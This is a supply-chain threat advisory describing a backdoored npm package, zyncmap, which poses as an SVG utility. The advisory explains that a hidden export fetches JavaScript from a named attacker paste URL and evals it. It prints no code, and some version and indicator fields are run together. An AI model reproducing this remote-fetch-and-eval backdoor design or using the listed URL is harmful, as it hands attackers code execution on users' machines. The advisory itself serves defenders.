Supply-chain threat intelligence

Incident detail

criticalnpm·malware·osv

Malicious code in zyncmap (npm)

zyncmap

Risk score

92

AI summary

Indexed incident for zyncmap (npm).

Description

zyncmap@0.0.0 advertises itself as an SVG sanitization/minification utility, but index.js exports an undocumented function getPlugin() that, when invoked, performs an HTTP GET against the anonymous paste host https://www.jsonkeeper.com/b/3P9BF and passes the response's model string field directly to eval(). Content at that paste URL is attacker-mutable, so any consumer that calls the exported getPlugin() executes arbitrary attacker-controlled JavaScript in the installer's Node.js process. The README and ~80% of index.js implement plausible SVG helpers as cover; the remote-fetch+eval export and a misleading bearrtoken: "logo" header are appended separately and not mentioned in package documentation. This is a backdoor: a hidden code path giving the publisher persistent remote code execution against any consumer who reaches the export.

Technical details

Affected versions

=0.0.1=0.0.0

Indicators

  • affected version=0.0.175%
  • affected version=0.0.075%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents